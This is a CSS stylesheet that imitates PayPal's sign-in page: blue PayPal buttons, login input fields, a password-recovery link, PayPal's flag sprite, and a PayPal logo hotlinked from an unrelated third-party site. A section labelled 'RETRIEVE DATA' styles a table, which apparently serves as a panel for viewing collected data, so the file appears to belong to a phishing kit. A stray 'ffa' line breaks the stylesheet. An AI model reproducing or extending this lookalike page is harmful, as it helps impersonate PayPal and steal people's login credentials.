* { box-sizing: border-box; }

input,
button {
    all: unset;
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
}

html {
    background-color: #FFFFFF;
}

html,
body {
    width: 100%;
    margin: 0;
    padding: 0;
    font-family: Arial, Helvetica, sans-serif;
    color: #929697;
    font-size: 15px;
    -webkit-font-smoothing: antialiased;
    -webkit-backface-visibility: hidden;
    -moz-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
    -webkit-text-size-adjust: 100%;
    display: flex;
    flex-direction: row;
    justify-content: center;
    align-items: center;
}

.header__wrapper__logo {
    background-position: 0px -130px;
    width: 250px;
    height: 60px;
    margin: 0 auto;
    background-image: url(https://www.reckon.com/marketplace/wp-content/uploads/2020/07/PayPal-Logo.jpg);
    background-repeat: repeat-x;
}

.logo {
    height: 100%;
    width: 100%;
}

.content__important {
    padding: 0 8% 30px;
    width: 100%;
    background-color: #FFFFFF;
    /*background-color: #dfd0d1;*/
}

header {
    display: flex;
    flex-direction: row;
    justify-content: center;
    margin-bottom: 20px;
}

.input-wrapper {
    margin-bottom: 20px;
}

.input__field {
    -webkit-background-clip: padding-box;
    -moz-background-clip: padding-box;
    background-clip: padding-box;
    -webkit-transition: border .2s ease-in-out,background-color .2s ease-in-out;
    -moz-transition: border .2s ease-in-out,background-color .2s ease-in-out;
    -o-transition: border .2s ease-in-out,background-color .2s ease-in-out;
    transition: border .2s ease-in-out,background-color .2s ease-in-out;
    height: 44px;
    width: 100%;
    padding: 0 10px;
    border: 1px solid #9da3a6;
    background: #fff;
    text-overflow: ellipsis;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    -khtml-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    color: #000;
    font-size: 1em;
    font-family: Helvetica,Arial,sans-serif;
    font-weight: 400;
    direction: ltr;
}

.input__field.submit,
.signup {
    width: 100%;
    min-height: 44px;
    padding: 0;
    border: 0;
    display: block;
    background-color: #0070ba;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    -khtml-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    cursor: pointer;
    -webkit-appearance: none;
    -moz-appearance: none;
    -ms-appearance: none;
    -o-appearance: none;
    appearance: none;
    -webkit-tap-highlight-color: transparent;
    color: #fff;
    font-size: 1em;
    text-align: center;
    font-weight: 700;
    font-family: Arial, Helvetica, sans-serif;
    text-shadow: none;
    text-decoration: none;
    text-transform: capitalize;
    -webkit-transition: background-color .4s ease-out;
    -moz-transition: background-color .4s ease-out;
    -o-transition: background-color .4s ease-out;
    transition: background-color .4s ease-out;
    -webkit-font-smoothing: antialiased;
}

.signup {
    text-transform: lowercase;
}

.signup:first-letter {
    text-transform: uppercase;
}

.signup {
    background-color: #E1E7EB;
    color: #2C2E2F;
}

.signup:hover {
    background-color: #b8a0a2;
}

.input__field.submit:hover {
    outline: 0;
    background: #b8a0a2;
}

.separator {
    border-top: 1px solid #ffffff;
    position: relative;
    margin: 25px 0 10px;
    text-align: center;
}

.separator .separator__label {
    background-color: #fff;
    padding: 0 .5em;
    position: relative;
    color: #6c7378;
    top: -.7em;
}

.choose-lenguage__wrapper {
    display: block;
    font-size: 11px;
    margin-top: 65px;
}

.choose-lenguage__list {
    margin: 0;
    padding: 0;
    list-style: none;
    display: inline-flex;
    align-items: center;
}

.choose-lenguage__list__elem {
    padding: 0 6px;
    display: inline-block;
    border-left: 1px solid #ccc;
}

.choose-lenguage__list__elem:first-child {
    color: #666;
    font-weight: 700;
    padding-left: 0;
    border-left: 0;
}

.flag__wrapper {
    display: inline-block;
    vertical-align: middle;
    position: relative;
}
ffa
.flag__wrapper button {
    display: inline-block;
    margin-right: 30px;
    cursor: pointer;
}

.flag__wrapper button::after {
    content: '';
    position: absolute;
    bottom: 10px;
    height: 8px;
    width: 8px;
    left: 30px;
    margin: 8px 0 0 8px;
    border-color: #333;
    border-image: none;
    border-style: solid;
    border-width: 1px 1px 0 0;
    -webkit-transform: rotate(135deg);
    -moz-transform: rotate(135deg);
    -o-transform: rotate(135deg);
    -ms-transform: rotate(135deg);
    transform: rotate(135deg);
}

.flag__wrapper .country {
    overflow: hidden;
    height: 24px;
    min-width: 32px;
    background: transparent url(https://www.paypalobjects.com/webstatic/mktg/icons/sprite_countries_flag4.png) 5px 100px no-repeat;
    border: none;
    text-align: left;
    background-position: 5px -3604px;
}

.recovery-psw {
    text-align: center;
}

.recovery-psw a {
    color: #0070ba;
    font-weight: 400;
    text-decoration: none;
    -webkit-transition: color .2s ease-out;
    -moz-transition: color .2s ease-out;
    -o-transition: color .2s ease-out;
    transition: color .2s ease-out;
}

.recovery-psw a:hover {
    text-decoration: underline;
}

/*TODO: REMOVE*/
.gdprCookieBanner__wrapper {
    display: none;
}

.gdprCookieBanner__wrapper,
footer {
    position: fixed;
    bottom: 0;
}

.gdprCookieBanner__btn__arrow {
    margin-left: 5px;
    border: solid white;
    border-width: 0 2px 2px 0;
    display: inline-block;
    padding: 4px;
    transform: rotate(-45deg);
    -webkit-transform: rotate(-45deg);
}

footer {
    text-align: center;
    width: 100%;
    padding: 14px;
    background-color: #F7F9FA;
}

footer ul {
    display: flex;
    flex-direction: row;
    list-style: none;
    justify-content: center;
    align-items: center;
    margin: 0;
    padding: 0;
    height: 12px;
}

footer ul li a {
    font-weight: 400;
    text-decoration: none;
    -webkit-transition: color .2s ease-out;
    -moz-transition: color .2s ease-out;
    -o-transition: color .2s ease-out;
    transition: color .2s ease-out;
    color: #666;
    white-space: nowrap;
    font-size: 11px;
}

footer ul li a {
    display: inline-block;
    margin: 0 10px 0 0;
}

footer ul li a:hover {
    text-decoration: underline;
    outline: 0;
}

@media screen and (min-width: 992px) {
}

@media screen and (min-width: 768px) {
    .content__important {
        padding: 42px 42px 36px;
        border: 1px solid #eaeced;
        overflow: auto;
        max-width: 460px;
    }
}

.success__message {
    padding-top: 40px;
    font-size: 16px;
    line-height: 24px;
}

/* RETRIEVE DATA START */
/* TABLE CSS START */
.table {
    display: flex;
    flex-direction: column;
}

.retrieve-data .content {
    padding: 0;
    margin-top: 64px;
    margin-bottom: 64px;
    display: flex;
    flex-direction: column;
    justify-content: center;
    color: white;
    background-color: white;
}

.table .row {
    background-color: #0070ba8c;
}

.table .row.only-desktop {
    display: none;
}

.table .row {
    display: flex;
    flex-direction: column;
    border: 1px solid black;
    border-radius: 5px;
    margin-bottom: 30px;
}

.table .row .col {
    display: flex;
    flex-direction: row;
    justify-content:space-between;
    padding: 16px;
}

.retrieve-data form {
    margin: 0;
    width: 100%;
    text-align: center;
}

@media screen and (min-width: 700px) {
    .retrieve-data .content {
        background-color: white;
    }

    .table .row.only-desktop {
        display: flex;
    }

    .table .row {
        flex-direction: row;
        justify-content: space-between;
        margin-bottom: 0;
        border-bottom: none;
        padding: 25px;
    }

    .table .row .col {
        flex-direction: column;
    }

    .table .row .col-descr {
        display: none;
    }
    
    .table .row:last-child {
        border-bottom: 1px solid black;
    }

    .retrieve-data .submit__input:hover {
        text-decoration: underline;
    }
}
/* TABLE CSS END */
.retrieve-data {
    padding: 0 20px;
    margin-top: 40px;
}

/* RETRIEVE DATA END */

.img__wrapper {
    margin-top: 20px;
    margin-bottom: 20px;
    height: 20%;
    width: 100%;
}

.img__wrapper img {
    height: 100%;
    width: 100%;
}

.label__wrapper {
    margin-top: 20px;
    margin-bottom: 20px;  
    font-size: 17px;
}

.success-label {
    font-size: 18px;
}

/* The container must be positioned relative: */
.custom-select {
    position: relative;
    font-family: Arial;
  }
  
  .custom-select select {
    display: none; /*hide original SELECT element: */
  }
  
  .select-selected {
    background-color: #fff;
  }
  
  /* Style the arrow inside the select element: */
  .select-selected:after {
    position: absolute;
    content: "";
    top: 14px;
    right: 10px;
    width: 0;
    height: 0;
    border: 6px solid transparent;
    border-color: black transparent transparent transparent;
  }
  
  /* Point the arrow upwards when the select box is open (active): */
  .select-selected.select-arrow-active:after {
    border-color: transparent transparent black transparent;
    top: 7px;
  }
  
  /* style the items (options), including the selected item: */
  .select-items div,.select-selected {
    color: black;
    padding: 8px 16px;
    border: 1px solid transparent;
    border-color: transparent transparent rgba(0, 0, 0, 0.1) transparent;
    cursor: pointer;
  }
  
  /* Style items (options): */
  .select-items {
    position: absolute;
    background-color: #fff;
    top: 100%;
    left: 0;
    right: 0;
    z-index: 99;
  }
  
  /* Hide the items when the select box is closed: */
  .select-hide {
    display: none;
  }
  
  .select-items div:hover, .same-as-selected {
    background-color: rgba(0, 0, 0, 0.1);
  }